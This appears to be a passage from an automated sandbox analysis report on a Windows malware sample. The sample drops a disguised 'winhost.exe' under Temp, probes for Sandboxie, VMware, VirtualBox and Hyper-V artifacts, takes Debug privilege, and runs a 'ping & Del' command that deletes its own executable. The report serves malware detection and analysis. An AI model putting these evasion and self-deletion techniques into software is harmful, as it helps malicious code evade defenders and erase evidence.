                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion:

                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: winhost.exe, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe Binary or memory string: SBIEDLL.DLL
                  Source: winhost.exe, 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLH
                  Source: winhost.exe, 00000010.00000002.722800429.000000001EBC6000.00000004.00000001.sdmp Binary or memory string: C:\USERS\user\APPDATA\LOCAL\TEMP\MICROSOFT\MYCLIENT\SBIEDLL.DLL
                  Source: winhost.exe, 00000010.00000002.722800429.000000001EBC6000.00000004.00000001.sdmp Binary or memory string: C:\WINDOWS\SYSTEM32\ONDEMANDCONNROUTEHELPER.DLLPS\SBIEDLL.DLL
                  Source: winhost.exe, 00000008.00000003.674464515.000000001E818000.00000004.00000001.sdmp Binary or memory string: C:\USERS\user\APPDATA\LOCAL\MICROSOFT\WINDOWSAPPS\SBIEDLL.DLLL.DLL
                  Source: winhost.exe, 00000008.00000002.675815876.0000000000D68000.00000004.00000001.sdmp Binary or memory string: C:\WINDOWS\SYSTEM32\ONDEMANDCONNROUTEHELPER.DLLIENT\SBIEDLL.DLL
                  Uses ping.exe to sleep
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe TID: 6780 Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe TID: 4600 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe TID: 768 Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe TID: 5776 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe TID: 6016 Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe TID: 7032 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe TID: 5888 Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe TID: 7020 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe TID: 6420 Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe TID: 5072 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe File opened: C:\Users\user\AppData\Local\
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe File opened: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe File opened: C:\Users\user\AppData\Local\Temp\Microsoft\
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe File opened: C:\Users\user\AppData\
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe File opened: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe:Zone.Identifier
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe File opened: C:\Users\user\
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe Binary or memory string: \vboxmrxnp.dll=cmd.exe /c ping 0 -n 2 & del "
                  Source: winhost.exe, 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp Binary or memory string: #"C:\Windows\system32\vmGuestLib.dll
                  Source: winhost.exe, 00000010.00000002.722699678.000000001EB70000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_
                  Source: winhost.exe Binary or memory string: \vboxmrxnp.dll
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.669454149.000000001B9B0000.00000002.00000001.sdmp, winhost.exe, 00000008.00000002.680419646.000000001B750000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.703488772.000000001B870000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.710896997.000000001BA00000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.723244194.000000001B050000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                  Source: winhost.exe, 00000013.00000002.729582154.000000001E32C000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWc`
                  Source: winhost.exe, 00000013.00000002.729706275.000000001E368000.00000004.00000001.sdmp Binary or memory string: \??\C:\Windows\system32\vmGuestLib.dllxe
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe Binary or memory string: vmware
                  Source: winhost.exe, 00000013.00000002.729473552.000000001E2F0000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_@
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.665033389.0000000000FEA000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.669454149.000000001B9B0000.00000002.00000001.sdmp, winhost.exe, 00000008.00000002.680419646.000000001B750000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.703488772.000000001B870000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.710896997.000000001BA00000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.723244194.000000001B050000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.669454149.000000001B9B0000.00000002.00000001.sdmp, winhost.exe, 00000008.00000002.680419646.000000001B750000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.703488772.000000001B870000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.710896997.000000001BA00000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.723244194.000000001B050000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                  Source: winhost.exe, 00000010.00000002.722800429.000000001EBC6000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\v
                  Source: winhost.exe, 00000013.00000002.729659475.000000001E357000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: winhost.exe, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe Binary or memory string: \vmGuestLib.dll
                  Source: winhost.exe, 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp Binary or memory string: C:\Windows\vboxmrxnp.dll
                  Source: winhost.exe, 00000008.00000002.682847339.000000001E7DC000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.709843837.000000001E8EC000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.722699678.000000001EB70000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.669454149.000000001B9B0000.00000002.00000001.sdmp, winhost.exe, 00000008.00000002.680419646.000000001B750000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.703488772.000000001B870000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.710896997.000000001BA00000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.723244194.000000001B050000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe Memory allocated: page read and write | page guard
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe'
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe Process created: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe'
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
